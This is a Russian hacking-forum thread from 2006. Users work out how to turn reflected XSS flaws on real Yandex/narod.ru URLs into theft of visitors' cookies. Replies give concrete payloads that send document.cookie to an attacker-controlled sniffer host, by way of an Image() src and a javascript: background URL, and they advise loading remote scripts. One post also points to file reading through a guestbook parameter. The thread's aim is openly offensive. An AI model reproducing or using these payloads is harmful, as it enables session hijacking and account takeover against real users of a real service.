ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Xss на яндексе, помогите составить корректный запрос.
  #1  
Старый 21.03.2006, 21:15
red1rect
Новичок
Регистрация: 21.03.2006
Сообщений: 7
Провел на форуме:
46994

Репутация: 3
По умолчанию Xss на яндексе, помогите составить корректный запрос.

Прошу помощи, нашел я на саите одном ещё активную Xss на яндексе:
http://www.narod.ru/guestbook/?owner=1&mainhtml=gb.txt&messageshtml=%3Cscript%3E alert(document.cookie)%3C/script%3E

Но вот как бы сформировать запрос, что бы на снифер приходили все куки(если это вообще возможно), какие я только не формировал запросы, но на снифер ничего не идет,будьте добры помогите.

Заранее спасибо

Последний раз редактировалось red1rect; 21.03.2006 в 21:29..
 
Ответить с цитированием

  #2  
Старый 21.03.2006, 22:08
Utochka
Постоянный
Регистрация: 21.12.2005
Сообщений: 620
Провел на форуме:
1867718

Репутация: 268


По умолчанию

Повидимому так:
http://www.narod.ru/guestbook/?owner=1&mainhtml=gb.txt&messageshtml=<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
 
Ответить с цитированием

  #3  
Старый 21.03.2006, 22:32
red1rect
Новичок
Регистрация: 21.03.2006
Сообщений: 7
Провел на форуме:
46994

Репутация: 3
По умолчанию

К сожалению куки не идут, я такой запрос уже пробовал.

На саите даны 2 уязвимости, может вторая сработает, но как только я не подставлял ссылку на снифер, ниодного кука я не получил.

Пример №1:
http://narod.yandex.ru/rubrics/top100.xhtml?sort=xaxa><script>alert('Bug')</script><a%20a=&c=2xaxa
Пример №2:
http://www.narod.ru/guestbook/?owner=1&mainhtml=gb.txt&messageshtml=%3Cscript%3E alert('x')%3C/script%3E

Последний раз редактировалось red1rect; 21.03.2006 в 22:38..
 
Ответить с цитированием

  #4  
Старый 22.03.2006, 01:15
PinkPanther
[ розовый мафиозо ]
Регистрация: 16.03.2005
Сообщений: 301
Провел на форуме:
1736355

Репутация: 241
По умолчанию

попробуй подгрузить через <img src=""; xss>, иль что еще лучше, что 100% должно прокатить, подгрузить код через <script src="">. Когда наработку одну мутил, тож куки не ишли, посему пришлось вот как исправлять ситуацию: http://hackzona.ru/hz.php?name=News&...rder=0&thold=0 чего и тебе советую, а именно подгуржать через <script src="">.
 
Ответить с цитированием

  #5  
Старый 22.03.2006, 01:53
red1rect
Новичок
Регистрация: 21.03.2006
Сообщений: 7
Провел на форуме:
46994

Репутация: 3
По умолчанию

Цитата:
Сообщение от PinkPanther  
попробуй подгрузить через <img src=""; xss>, иль что еще лучше, что 100% должно прокатить, подгрузить код через <script src="">. Когда наработку одну мутил, тож куки не ишли, посему пришлось вот как исправлять ситуацию: http://hackzona.ru/hz.php?name=News&...rder=0&thold=0 чего и тебе советую, а именно подгуржать через <script src="">.


Вот за это спасибо, уже есть результат, но к сожалению на снифер приходит только ;document.cookie; при моем запросе:
http://narod.yandex.ru/rubrics/top100.xhtml?sort=xaxa><img src="мой_сниф/pic.gif?;"+document.cookie; xss><a a=&c=2xaxa

Поэксперементировав с запросами, кукисов я так и не получил, к сожалению.
За статью тоже спасибо, на днях буду тоже эксперементировать.

Может кто нибудь ещё знает, какие могут быть варианты с этими XSS?
 
Ответить с цитированием

  #6  
Старый 22.03.2006, 02:11
PinkPanther
[ розовый мафиозо ]
Регистрация: 16.03.2005
Сообщений: 301
Провел на форуме:
1736355

Репутация: 241
По умолчанию

Цитата:
Сообщение от red1rect  
при моем запросе:
http://narod.yandex.ru/rubrics/top100.xhtml?sort=xaxa><img src="мой_сниф/pic.gif?;"+document.cookie; xss><a a=&c=2
Не, это неправильно, точнее сказать куки этим не схватить.
Держи примерный вариант про который я говорил:
Код:
<img src="" style="background:white url(javascript:document.images[0].src='http://мой_сниф/pic.gif?'+document.cookie)">

Последний раз редактировалось PinkPanther; 22.03.2006 в 02:13..
 
Ответить с цитированием

  #7  
Старый 22.03.2006, 02:52
red1rect
Новичок
Регистрация: 21.03.2006
Сообщений: 7
Провел на форуме:
46994

Репутация: 3
По умолчанию

Спасибо за скрипт,как я понял его надо сюда запихивать:

http://narod.yandex.ru/rubrics/top100.xhtml?sort=xaxa><img src="" style="background:white url(javascript:document.images[0].src='http://мой_сниф/pic.gif?'+document.cookie)"><a a=&c=2

если я правильно понял, то значит скрипт не работает.


А вот метод, описанный в твоё статье, ты давно проверял на работоспособность?
 
Ответить с цитированием

  #8  
Старый 22.03.2006, 14:18
ZaCo
Banned
Регистрация: 20.06.2005
Сообщений: 880
Провел на форуме:
4610226

Репутация: 1332


По умолчанию

эххх че вы бредом маетесь уязвимость скажу я вам более чем интересная.
owner - там передается некий ид сайта (к сожалению все фильтруется). потом, с помощью запроса, сервер бд возвращает урл народовского сайта, если таковой имеется.
если mainhtml не передается или протсо содержит пустое значение, то отображается геста прилагаемая к этому сайту, иначе идет подставление SAIT+$mainhtml и отображается вместо гесты. Кстати говоря это имеенно чтение файлов на сайте, но на народовском сайте. потом посмотрю мож будет че нить умное...
Возвращаясь к хсс, зачем передавать их явно когда можа схитрить
_http://www.narod.ru/guestbook/?owner=21151691&mainhtml=mda.html
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
кто играет в www.ganjawars.ru ??? помогите kuppher Болталка 12 26.07.2008 23:38
www.chat.love4u.ru - помогите получить прова админа! airwil Чаты 4 30.04.2006 15:35
Нашел XSS в теге site. Какой запрос надо вставить, что бы получить куки юзеров? Sky Форумы 3 04.11.2004 15:02



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ